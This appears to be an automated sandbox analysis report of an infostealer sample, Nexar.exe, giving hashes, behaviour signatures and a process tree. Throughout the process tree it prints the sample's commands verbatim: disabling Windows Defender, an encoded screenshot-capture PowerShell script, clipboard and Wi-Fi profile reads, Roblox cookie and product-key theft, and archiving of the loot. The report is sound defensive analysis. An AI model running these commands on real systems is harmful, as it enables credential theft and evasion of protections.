Analysis

  • max time kernel
    13s
  • max time network
    34s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    28-10-2024 12:33

General

  • Target

    Nexar.exe

  • Size

    7.6MB

  • MD5

    e79f13238418281f91b9060e58020bac

  • SHA1

    bef9b4abb0e779c1a8519f731e2433156372f2ba

  • SHA256

    4ef68e3dc9748d50c7df66349d324ab972cb313645492c192809648e1e563737

  • SHA512

    d77dbeb4c6c65c5667bcb5699f8e4389b66f9e21be125266c516c08277f5664211c3ee7ad18dc0d92dd78b67011eb226e95d54ca69d8d4e1ca9e1ddeb9c890b3

  • SSDEEP

    196608:iIgVVE9GwfI9jUC2gYBYv3vbW2+iITx1U6n4:GVVE9tIH2gYBgDWJTnz4

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Using powershell.exe command.

  • Drops file in Drivers directory 3 IoCs
  • Clipboard Data 1 TTPs 2 IoCs

    Adversaries may collect data stored in the clipboard from users copying information within or between applications.

  • Loads dropped DLL 17 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Obfuscated Files or Information: Command Obfuscation 1 TTPs

    Adversaries may obfuscate content during command execution to impede detection.

  • Enumerates processes with tasklist 1 TTPs 4 IoCs
  • UPX packed file 43 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

    Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Gathers system information 1 TTPs 1 IoCs

    Runs systeminfo.exe.

  • Suspicious behavior: EnumeratesProcesses 13 IoCs
  • Suspicious use of AdjustPrivilegeToken 50 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 2 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Nexar.exe
    "C:\Users\Admin\AppData\Local\Temp\Nexar.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1176
    • C:\Users\Admin\AppData\Local\Temp\Nexar.exe
      "C:\Users\Admin\AppData\Local\Temp\Nexar.exe"
      2⤵
      • Drops file in Drivers directory
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:2748
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nexar.exe'"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3276
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nexar.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2576
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4360
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4348
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:512
        • C:\Windows\system32\tasklist.exe
          tasklist /FO LIST
          4⤵
          • Enumerates processes with tasklist
          • Suspicious use of AdjustPrivilegeToken
          PID:3172
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3968
        • C:\Windows\system32\tasklist.exe
          tasklist /FO LIST
          4⤵
          • Enumerates processes with tasklist
          • Suspicious use of AdjustPrivilegeToken
          PID:5060
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:5056
        • C:\Windows\System32\Wbem\WMIC.exe
          WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
          4⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:4512
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
        3⤵
        • Clipboard Data
        • Suspicious use of WriteProcessMemory
        PID:980
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell Get-Clipboard
          4⤵
          • Clipboard Data
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1440
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1156
        • C:\Windows\system32\tasklist.exe
          tasklist /FO LIST
          4⤵
          • Enumerates processes with tasklist
          • Suspicious use of AdjustPrivilegeToken
          PID:5064
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4760
        • C:\Windows\system32\tree.com
          tree /A /F
          4⤵
            PID:1392
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
          3⤵
          • System Network Configuration Discovery: Wi-Fi Discovery
          • Suspicious use of WriteProcessMemory
          PID:924
          • C:\Windows\system32\netsh.exe
            netsh wlan show profile
            4⤵
            • Event Triggered Execution: Netsh Helper DLL
            • System Network Configuration Discovery: Wi-Fi Discovery
            PID:4796
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "systeminfo"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:3460
          • C:\Windows\system32\systeminfo.exe
            systeminfo
            4⤵
            • Gathers system information
            PID:4504
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:3480
          • C:\Windows\system32\reg.exe
            REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
            4⤵
              PID:2512
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:4692
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
              4⤵
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:1232
              • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\fcq4soxy\fcq4soxy.cmdline"
                5⤵
                  PID:5080
                  • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                    C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA2D7.tmp" "c:\Users\Admin\AppData\Local\Temp\fcq4soxy\CSCF986E6BCEA6C44D399B8019D1EC65CE.TMP"
                    6⤵
                      PID:2304
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
                3⤵
                • Suspicious use of WriteProcessMemory
                PID:2388
                • C:\Windows\system32\attrib.exe
                  attrib -r C:\Windows\System32\drivers\etc\hosts
                  4⤵
                  • Drops file in Drivers directory
                  • Views/modifies file attributes
                  PID:3236
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c "tree /A /F"
                3⤵
                • Suspicious use of WriteProcessMemory
                PID:2284
                • C:\Windows\system32\tree.com
                  tree /A /F
                  4⤵
                    PID:4952
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
                  3⤵
                  • Suspicious use of WriteProcessMemory
                  PID:3032
                  • C:\Windows\system32\attrib.exe
                    attrib +r C:\Windows\System32\drivers\etc\hosts
                    4⤵
                    • Drops file in Drivers directory
                    • Views/modifies file attributes
                    PID:1376
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /c "tree /A /F"
                  3⤵
                    PID:3404
                    • C:\Windows\system32\tree.com
                      tree /A /F
                      4⤵
                        PID:4928
                    • C:\Windows\system32\cmd.exe
                      C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                      3⤵
                        PID:1380
                        • C:\Windows\system32\tasklist.exe
                          tasklist /FO LIST
                          4⤵
                          • Enumerates processes with tasklist
                          • Suspicious use of AdjustPrivilegeToken
                          PID:4052
                      • C:\Windows\system32\cmd.exe
                        C:\Windows\system32\cmd.exe /c "tree /A /F"
                        3⤵
                          PID:5092
                          • C:\Windows\System32\Conhost.exe
                            \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            4⤵
                              PID:4952
                            • C:\Windows\system32\tree.com
                              tree /A /F
                              4⤵
                                PID:704
                            • C:\Windows\system32\cmd.exe
                              C:\Windows\system32\cmd.exe /c "tree /A /F"
                              3⤵
                                PID:1376
                                • C:\Windows\System32\Conhost.exe
                                  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  4⤵
                                    PID:5056
                                  • C:\Windows\system32\tree.com
                                    tree /A /F
                                    4⤵
                                      PID:3684
                                  • C:\Windows\system32\cmd.exe
                                    C:\Windows\system32\cmd.exe /c "tree /A /F"
                                    3⤵
                                      PID:4584
                                      • C:\Windows\system32\tree.com
                                        tree /A /F
                                        4⤵
                                          PID:4004
                                      • C:\Windows\system32\cmd.exe
                                        C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                        3⤵
                                          PID:2900
                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                            4⤵
                                            • Command and Scripting Interpreter: PowerShell
                                            PID:5080
                                        • C:\Windows\system32\cmd.exe
                                          C:\Windows\system32\cmd.exe /c "getmac"
                                          3⤵
                                            PID:612
                                            • C:\Windows\system32\getmac.exe
                                              getmac
                                              4⤵
                                                PID:3620
                                            • C:\Windows\system32\cmd.exe
                                              C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                              3⤵
                                                PID:208
                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                  4⤵
                                                    PID:3276
                                                • C:\Windows\system32\cmd.exe
                                                  C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI11762\rar.exe a -r -hp"1234" "C:\Users\Admin\AppData\Local\Temp\pHhZP.zip" *"
                                                  3⤵
                                                    PID:4852
                                                    • C:\Users\Admin\AppData\Local\Temp\_MEI11762\rar.exe
                                                      C:\Users\Admin\AppData\Local\Temp\_MEI11762\rar.exe a -r -hp"1234" "C:\Users\Admin\AppData\Local\Temp\pHhZP.zip" *
                                                      4⤵
                                                        PID:2648
                                                    • C:\Windows\system32\cmd.exe
                                                      C:\Windows\system32\cmd.exe /c "wmic os get Caption"
                                                      3⤵
                                                        PID:3740
                                                        • C:\Windows\System32\Wbem\WMIC.exe
                                                          wmic os get Caption
                                                          4⤵
                                                            PID:4520
                                                        • C:\Windows\system32\cmd.exe
                                                          C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
                                                          3⤵
                                                            PID:3004
                                                            • C:\Windows\System32\Wbem\WMIC.exe
                                                              wmic computersystem get totalphysicalmemory
                                                              4⤵
                                                                PID:1600
                                                            • C:\Windows\system32\cmd.exe
                                                              C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                                                              3⤵
                                                                PID:4388
                                                                • C:\Windows\System32\Wbem\WMIC.exe
                                                                  wmic csproduct get uuid
                                                                  4⤵
                                                                    PID:1356
                                                                • C:\Windows\system32\cmd.exe
                                                                  C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
                                                                  3⤵
                                                                    PID:1308
                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
                                                                      4⤵
                                                                      • Command and Scripting Interpreter: PowerShell
                                                                      PID:64
                                                                  • C:\Windows\system32\cmd.exe
                                                                    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
                                                                    3⤵
                                                                      PID:2052
                                                                      • C:\Windows\System32\Wbem\WMIC.exe
                                                                        wmic path win32_VideoController get name
                                                                        4⤵
                                                                        • Detects videocard installed
                                                                        PID:4780
                                                                    • C:\Windows\system32\cmd.exe
                                                                      C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
                                                                      3⤵
                                                                        PID:4060
                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
                                                                          4⤵
                                                                            PID:2116
                                                                    • C:\Windows\system32\cmd.exe
                                                                      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\AddWrite.bat" "
                                                                      1⤵
                                                                        PID:4156
                                                                      • C:\Windows\servicing\TrustedInstaller.exe
                                                                        C:\Windows\servicing\TrustedInstaller.exe
                                                                        1⤵
                                                                          PID:2388

                                                                        Network

                                                                        MITRE ATT&CK Enterprise v15

                                                                        Replay Monitor

                                                                        Loading Replay Monitor...

                                                                        Downloads

                                                                        • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                                                                          Filesize

                                                                          3KB

                                                                          MD5

                                                                          8740e7db6a0d290c198447b1f16d5281

                                                                          SHA1

                                                                          ab54460bb918f4af8a651317c8b53a8f6bfb70cd

                                                                          SHA256

                                                                          f45b0efc0833020dfeeaad0adc8ed10b0f85e0bc491baf9e1a4da089636bccf5

                                                                          SHA512

                                                                          d91fe9666c4923c8e90e5a785db96e5613b8cb3bf28983296a2f381ccdcd73d15254268548e156c8150a9a531712602313ba65f74cec5784341c8d66b088750b

